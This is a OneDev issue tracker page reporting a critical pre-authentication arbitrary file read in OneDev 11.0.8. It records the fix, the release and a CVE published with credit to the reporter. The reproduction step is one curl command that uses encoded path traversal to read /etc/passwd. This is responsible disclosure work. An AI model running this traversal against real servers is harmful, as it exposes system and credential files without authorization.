Siebene@
opened 1 year ago
-
Name Previous Value Current Value Assignee
robin
empty -
Name Previous Value Current Value Assignee
empty robin
-
Thank you. This will be fixed soon.
-
OneDev
changed state to 'Closed' 1 year ago
Previous Value Current Value Open
Closed
-
State changed as code fixing the issue is committed (4637aaac)
-
OneDev
changed state to 'Released' 1 year ago
Previous Value Current Value Closed
Released
-
State changed as build OD-5432 is successful
-
Hello, I would like to know if onedev will apply for a CVE for this issue. I hope to be credited under the name 'Siebene@'
-
Yes, I am requesting a CVE via GHSA. Will publish it after one month to give OneDev users a window to upgrade.
-
Previous Value Current Value true
false
-
@siebene I published the CVE and credited you: https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489
Thanks again for your report.
| Type |
Security Vulnerability
|
| Priority |
Critical
|
| Assignee | |
| Labels |
No labels
|
Issue Votes (0)
Watchers (2)
Arbitrary file reading exists in Onedev 11.0.8(latest)
This vulnerability does not require authentication, it is pre-auth, and has a severe impact.
What steps will reproduce the problem?
curl http://localhost:7576/test/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd